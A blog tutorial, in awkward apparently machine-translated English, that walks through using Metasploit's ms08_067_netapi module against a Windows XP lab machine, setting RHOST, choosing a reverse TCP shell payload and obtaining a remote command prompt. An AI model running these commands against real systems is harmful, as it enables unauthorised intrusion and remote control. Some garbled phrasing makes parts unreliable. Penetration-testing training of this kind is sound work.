Metasploit Framework

The Metasploit Framework is a Kali Linux tool that helps in the exploitation of any machine by using vulnerabilities to hack it.
If you have read my previous tutorials, you will remember that when we had scanned the target of our Windows XP, we had received a Vulnerability  MS08-067. We will hack the system from Metasploit by using the same Vulnerability.

How To Start Metasploit: –

To start msfconsole (MetaSploit Framework), first of all
Applications -> Exploitation Tools -> Metasploit Framework

Metasploit Framework 1
Metasploit Framework 1

click on After that Metasploit will start and you will see some such screen.

Metasploit framework 2
Metasploit framework 2

As you have seen in it, there are 1467 Exploits in it, 432 Payloads is Installed. These Exploits are just using us on our target. OK Now we are doing it to Exploit a Vulnerability MS08-67 to Metasploit. Metasploit can give us details about it. For that we need to use Metasploit’s Inbuilt Feature Search
msf> search ms08-67

Metasploit Framework 3
Metasploit Framework 3

So when we searched this, we got its Correct Module name known as ms08_067_netapi. Now if you enter the command: = msf > info exploit / windows / smb / ms08_067_netapi

Metasploit Framework 4
Metasploit Framework 4

As you have seen, after this command all the information about this Module has been shown. First of all, it has given information about it. After that in the platform told who it is for whom as it is in Windows. Rank is described. After that its targets have been shown. Then there is a Basic Options list. In this you have given some options which we have to set according to our target.
In RHOST we have to set the IP address of our target. We will read the entire details later in this. After that there is Payload Information which contains some information which tells you to use the angle bit payload for Metasploit Exploit.
Description: – This gives even more details of any vulnerability.
Reference: – It provides links to the online Vulnerability Database. From here also you can read any Vulnerability details.
OK, now we know the correct Module, so now we have to give Metasploit the command to use this Module.
msf> use windows / smb / ms08_067_netapi

Metasploit Framework 5
Metasploit Framework 5

Setting Module Options

OK, now we have to give some information to Metasploit so that we can exploit the vulnerability of our target. First of all, we check the settings of Metasploit, what is set in the end. For that we have to type the command: –
msf exploit (ms08_067_netapi)> show options

Metasploit Framework 6
Metasploit Framework 6

As you have been shown above in Screen-Shot, there are 3 options in it.
RHOST: – In this we have to enter the IP address of my target. First of all, we have to set it up on your target, you have to place the command for that.
set <option to set> <value to set>
set RHOST 192.168.79.160
[image set]
RPORT: – In this we have to put PORT to the attack. PORT such as 80, 442, 21 so on. We will not change this in our case and default 445 will remain.
SMBPIPE: – As we did not change the value in the RPORT, we will not change it as well and keep the default.
Exploit Target: – Exploit Target 0 is set on Automatic Targeting. It targets Operating System and Version. You can set it yourself and see how many targets it contains.
msf exploit (ms08_067_netapi)> show targets as show in picture

Metasploit Framework 7
Metasploit Framework 7

We know that our target is Windows XP SP3, but if this is not that easy, then let it remain at 0 so that it can automatically select the target.
Payloads / Shellcode
As we have seen in the Show Options command, our target is also in the list, now we just need to attack. But we have not yet told Exploit what to do after our target is exposed. To do all this, setting up Payloads in Metasploit is easy enough for us.
We will read about the Metalsploit payloads in the next tutorials. Type to see payloads:
msf exploit (ms08_067_netapi)> show payloads

Metasploit Framework 8
Metasploit Framework 8

Check Run: –
Ok to understand now, we will now just Exploit on Default Payload, for our targets, we just have to put a command now to exploit
msf exploit (ms08_067_netapi)> exploit

Metasploit Framwork 9
Metasploit Framwork 9

You have seen that now Meterpereter, which is a short form of Meta-interpreter, has started. With this we can now do many things with our targets, but we will all read it later in detail.
Note: – You see that Metasploit is using Port 4444. Now that we are exploiting our targets, it is correct, but when we use it in Real World, our target will drop Metasploit’s Connection because it will know that it is Metasploit.

Now we will not do much, after that we will now close the Exit Command entry.

Metasploit Framework 10
Metasploit Framework 10

Setting a Payload Manually
Ok, now we will manually select a payload. To set the payload: –
msf exploit (ms08_067_netapi)> set payload windows / shell_reverse_tcp

Metasploit Framework 11
Metasploit Framework 11

If this is a Reverse Shell then we have to tell the target that Shell has to send on Shell. For that we have to set our own Kali Linux IP Address.
Now we have to put an IP address of its ie’s Attacker in LHOST, to see Kali Linux’s IP address, type it
ipconfig

Metasploit Framework 12
Metasploit Framework 12

As my Kali Linux IP address is 192.168.79.130, we will enter: –
set LHOST 192.168.79.130

Metasploit Framework 13
Metasploit Framework 13

Now let’s see Exploit command again …

Metasploit Framework 14
Metasploit Framework 14

Yeah ;), you’ve successfully exploited Windows XP. Now on your screen, Windows XP’s Command Prompt is open, in which you can execute a Windows command by executing it:
Press CTRL + C to turn it off by pressing Y and pressing the Enter key.

Metasploit Framework 15
Metasploit Framework 15

So this was Metasploit’s first and Advance tutorial,

Thank You.

Join the Conversation

1 Comment

  1. Youre so cool! I dont suppose Ive read something like this before. So good to find somebody with some original thoughts on this subject. realy thanks for starting this up. this website is one thing that is wanted on the net, someone with a bit originality. helpful job for bringing something new to the web!

Leave a comment

Your email address will not be published. Required fields are marked *